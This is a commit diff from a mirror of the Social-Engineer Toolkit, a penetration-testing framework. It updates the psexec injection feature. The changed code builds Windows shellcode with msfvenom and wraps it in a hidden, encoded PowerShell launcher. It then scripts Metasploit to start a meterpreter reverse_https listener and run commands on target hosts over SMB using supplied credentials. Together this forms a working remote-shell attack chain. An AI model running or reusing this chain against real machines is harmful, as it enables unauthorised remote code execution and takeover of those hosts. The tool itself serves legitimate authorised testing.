mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-03-03 06:47:31 +00:00
this fixes a psexec issue within SET
This commit is contained in:
TrustedSec
parent
fdeae74159
commit
abd935679f
7 changed files with 50 additions and 46 deletions
|
|
@ -1,3 +1,10 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.9
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* config cleanup
|
||||
* fixed an issue when using psexec injection it would use reverse_tcp instead of reverse_https this was due to the set.config being used
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 7.3.8
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
|||
|
|
@ -40,7 +40,8 @@ if not os.path.isfile("/etc/setoolkit/set.config"):
|
|||
# here we check to ensure we have the latest version
|
||||
with open("/etc/setoolkit/set.config") as fileopen:
|
||||
data = fileopen.read()
|
||||
if "CONFIG_VERSION=7.2" not in data:
|
||||
|
||||
if "CONFIG_VERSION=7.3.9" not in data:
|
||||
print("[*] Overwriting old config for updates to SET. Backing up your old one in /etc/setoolkit/")
|
||||
shutil.move("/etc/setoolkit/set.config", "/etc/setoolkit/set.config.bak")
|
||||
shutil.copyfile("src/core/config.baseline", "/etc/setoolkit/set.config")
|
||||
|
|
|
|||
|
|
@ -1,31 +1,31 @@
|
|||
##################################################################################################
|
||||
##################################################################################################
|
||||
## ##
|
||||
## The following config file will allow you to customize settings within ##
|
||||
## the Social-Engineer Toolkit. The lines that do not have comment code ##
|
||||
## ("#") are the fields you want to toy with. They are pretty easy to ##
|
||||
## understand. ##
|
||||
## ##
|
||||
## The Metasploit path is the default path for where Metasploit is located. ##
|
||||
## Metasploit is required for SET to function properly. ##
|
||||
## ##
|
||||
## The "ETTERCAP" option specifies if you want to use ARP cache poisoning in ##
|
||||
## conjunction with the web attacks; note that ARP cache poisoning is only ##
|
||||
## ##
|
||||
## The following config file will allow you to customize settings within ##
|
||||
## the Social-Engineer Toolkit. The lines that do not have comment code ##
|
||||
## ("#") are the fields you want to toy with. They are pretty easy to ##
|
||||
## understand. ##
|
||||
## ##
|
||||
## The Metasploit path is the default path for where Metasploit is located. ##
|
||||
## Metasploit is required for SET to function properly. ##
|
||||
## ##
|
||||
## The "ETTERCAP" option specifies if you want to use ARP cache poisoning in ##
|
||||
## conjunction with the web attacks; note that ARP cache poisoning is only ##
|
||||
## for internal subnets only and does not work against people on the Internet. ##
|
||||
## ##
|
||||
## ##
|
||||
## The "SENDMAIL" option allows you to spoof source IP addresses utilizing an ##
|
||||
## program called Sendmail. Sendmail is not installed by default on Kali. ##
|
||||
## To spoof email addresses when performing the mass email attacks, you must ##
|
||||
## install Sendmail manually using the command: "apt-get install sendmail" ##
|
||||
# ##
|
||||
## program called Sendmail. Sendmail is not installed by default on Kali. ##
|
||||
## To spoof email addresses when performing the mass email attacks, you must ##
|
||||
## install Sendmail manually using the command: "apt-get install sendmail" ##
|
||||
# ##
|
||||
## Note that "ETTERCAP" and "SENDMAIL" options only accept ON or OFF switches. ##
|
||||
## ##
|
||||
## Note that the "Metasploit_PATH" option cannot have a '/' after the folder name. ##
|
||||
## ##
|
||||
## There are additional options; read the comments for additional descriptions. ##
|
||||
## ##
|
||||
## CONFIG_VERSION=7.2 ##
|
||||
## ##
|
||||
## ##
|
||||
## Note that the "Metasploit_PATH" option cannot have a '/' after the folder name. ##
|
||||
## ##
|
||||
## There are additional options; read the comments for additional descriptions. ##
|
||||
## ##
|
||||
## CONFIG_VERSION=7.3.9 ##
|
||||
## ##
|
||||
##################################################################################################
|
||||
##################################################################################################
|
||||
#
|
||||
|
|
@ -189,8 +189,8 @@ POWERSHELL_INJECTION=ON
|
|||
#
|
||||
### This will allow you to change the Metasploit payload to whatever you want based on the PowerShell alphanumeric
|
||||
### injection attack. Specify this if PowerShell injection is enabled and you want to change it from the standard
|
||||
### "reverse_tcp" attack. Note that all payloads use x86; the process will automatically downgrade to 32-bit.
|
||||
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_tcp
|
||||
### "reverse_https" attack. Note that all payloads use x86; the process will automatically downgrade to 32-bit.
|
||||
POWERSHELL_INJECT_PAYLOAD_X86=windows/meterpreter/reverse_https
|
||||
#
|
||||
### This option will spray multiple ports through PowerShell in an effort to get a port outbound.
|
||||
### Note that PowerShell injection must be enabled.
|
||||
|
|
|
|||
|
|
@ -1 +1 @@
|
|||
7.3.8
|
||||
7.3.9
|
||||
|
|
|
|||
|
|
@ -1389,7 +1389,6 @@ def socket_listener(port):
|
|||
|
||||
# generates powershell payload
|
||||
def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
|
||||
|
||||
# generate our shellcode first
|
||||
shellcode = metasploit_shellcode(payload, ipaddr, port)
|
||||
try:
|
||||
|
|
@ -1441,7 +1440,6 @@ def generate_powershell_alphanumeric_payload(payload, ipaddr, port, payload2):
|
|||
"$c", "$" + var2).replace("$2", "$" + var3).replace("$3", "$" + var4).replace("$x", "$" + var5)
|
||||
|
||||
# unicode and base64 encode and return it
|
||||
|
||||
return base64.b64encode(powershell_command.encode('utf_16_le')).decode("ascii")
|
||||
|
||||
# generate base shellcode
|
||||
|
|
@ -1450,11 +1448,12 @@ def generate_shellcode(payload, ipaddr, port):
|
|||
msf_path = meta_path()
|
||||
# generate payload
|
||||
port = port.replace("LPORT=", "")
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform windows --smallest -f c" %
|
||||
proc = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s StagerURILength=5 StagerVerifySSLCert=false -a x86 --platform windows --smallest -f c" %
|
||||
(msf_path, payload, ipaddr, port), stdout=subprocess.PIPE, shell=True)
|
||||
data = proc.communicate()[0]
|
||||
data = data.decode('ascii')
|
||||
# start to format this a bit to get it ready
|
||||
#goat
|
||||
repls = [';', ' ', '+', '"', '\n', 'unsigned char buf=',
|
||||
'unsignedcharbuf[]=', "b'", "'", '\\n']
|
||||
for repl in repls:
|
||||
|
|
|
|||
|
|
@ -74,8 +74,6 @@ try:
|
|||
core.update_options("POWERSHELL_SOLO=ON")
|
||||
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
|
||||
|
||||
#prep_powershell_payload()
|
||||
|
||||
try:
|
||||
core.module_reload(src.payloads.powershell.prep)
|
||||
except:
|
||||
|
|
@ -85,12 +83,12 @@ try:
|
|||
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
|
||||
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
|
||||
|
||||
with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
x86 = fileopen.read()
|
||||
#with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
|
||||
# x86 = fileopen.read()
|
||||
x86 = open(core.setdir + "x86.powershell", "r").read()
|
||||
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
|
||||
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
|
||||
filewrite = file(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
|
||||
#with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
|
||||
filewrite.write(x86)
|
||||
filewrite.close()
|
||||
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
|
||||
|
|
@ -101,19 +99,18 @@ try:
|
|||
filewrite.write("use multi/handler\n"
|
||||
"set payload windows/meterpreter/reverse_https\n"
|
||||
"set LPORT {0}\n"
|
||||
"set LHOST 0.0.0.0\n"
|
||||
"set LHOST {1}\n"
|
||||
"set EnableStageEncoding true\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit -j\n"
|
||||
"use auxiliary/admin/smb/psexec_command\n"
|
||||
"set RHOSTS {1}\n"
|
||||
"set SMBUser {2}\n"
|
||||
"set SMBPass {3}\n"
|
||||
"set SMBDomain {4}\n"
|
||||
"set THREADS {5}\n"
|
||||
"set COMMAND {6}\n"
|
||||
"set EnableStageEncoding {7}\n"
|
||||
"set ExitOnSession false\n"
|
||||
"exploit\n".format(port, rhosts, username, password, domain, threads, command, stage_encoding))
|
||||
"set RHOSTS {2}\n"
|
||||
"set SMBUser {3}\n"
|
||||
"set SMBPass {4}\n"
|
||||
"set SMBDomain {5}\n"
|
||||
"set THREADS {6}\n"
|
||||
"set COMMAND {7}\n"
|
||||
"exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding))
|
||||
|
||||
# launch metasploit below
|
||||
core.print_status("Launching Metasploit.. This may take a few seconds.")
|
||||
|
|
|
|||
|
|
@ -52,7 +52,7 @@ powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
|
|||
|
||||
# if we specified a hostname then default to reverse https/http
|
||||
if validate_ip(ipaddr) == False:
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_http"
|
||||
powershell_inject_x86 = "windows/meterpreter/reverse_https"
|
||||
|
||||
# prompt what port to listen on for powershell then make an append to the current
|
||||
# metasploit answer file
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue